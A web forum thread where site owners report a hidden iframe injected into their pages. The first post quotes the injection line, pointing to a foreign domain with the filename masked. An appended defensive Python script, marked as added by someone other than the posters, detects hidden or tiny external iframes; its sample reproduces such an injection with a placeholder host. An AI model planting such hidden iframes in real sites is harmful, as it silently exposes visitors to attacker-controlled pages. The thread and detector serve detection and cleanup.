A friend of mine found this line inserted into one of his files: <iframe name='StatPage' src='http://stelaartois.ru/xxxxx2.php' width=5 height=5 style='display:none'></iframe> I've x'ed out the filename to protect anyone here from getting the nasty bug by visiting the page themselves. I've suggested that he contact his host to try and tie up security from the server admin's side. What else can be done? Can this domain get shut down somehow? How do you report this? I see that others have been violated by this guy since over a month ago, after searching Google for this domain name and finding a thread in another forum.
I just logged in to ask the SAME question! A friend of mine found the exact same iframe inserted into the footer of his site - a custom PHP site hosted on a Linux box (I need to find out the distribution). He has a dedicated server, but it uses cPanel. I will query him for more details about his setup - perhaps we can track down some similarities. Also, I think it happened around 13:30 EST on Thursday. Are there any decent security consultants here on DP?
I just tried to open this URL from my browser. It was blocked by my firewall saying it's a spy site. Trying to find out more details...
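A defensive check for the kind of injection reported in this thread, added here as an example and not written by any of the posters: it flags iframes that load an external host while being hidden by style or shrunk to a few pixels. The function names, the `MAX_DIM` threshold and the hosts in the sample page are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
MAX_DIM = 10  # assumed threshold: frames at most this many pixels count as invisible

def _tiny(value):
    """True when a width/height attribute is a pixel count <= MAX_DIM."""
    m = re.fullmatch(r"\s*(\d+)\s*(?:px)?\s*", value or "", re.I)
    return bool(m) and int(m.group(1)) <= MAX_DIM

class IframeAudit(HTMLParser):
    """Collects iframes that load an external host while being hidden from view."""
    def __init__(self, trusted_hosts):
        super().__init__()
        self.trusted = {h.lower() for h in trusted_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        if not host or host in self.trusted:
            return  # same-site (relative) or allowlisted source
        reasons = []
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden-style")
        if _tiny(a.get("width")) or _tiny(a.get("height")):
            reasons.append("tiny-size")
        if reasons:
            self.findings.append((self.getpos()[0], host, reasons))

def audit(text, trusted_hosts=()):
    """Return [(line, host, reasons)] for suspicious iframes in one document."""
    parser = IframeAudit(trusted_hosts)
    parser.feed(text)
    parser.close()
    return parser.findings

# Constructed sample page: one legitimate embed, one injected hidden frame.
SAMPLE = """<html><body>
<iframe src="https://maps.partner.example/embed" width="600" height="400"></iframe>
<iframe name='StatPage' src='http://injected.example/stat.php' width=5 height=5 style='display:none'></iframe>
</body></html>
"""
```

Run `audit()` over every template and page file in the web root, passing the hosts the site embeds on purpose as `trusted_hosts`; comparing hits against file modification times helps narrow down when the change was made.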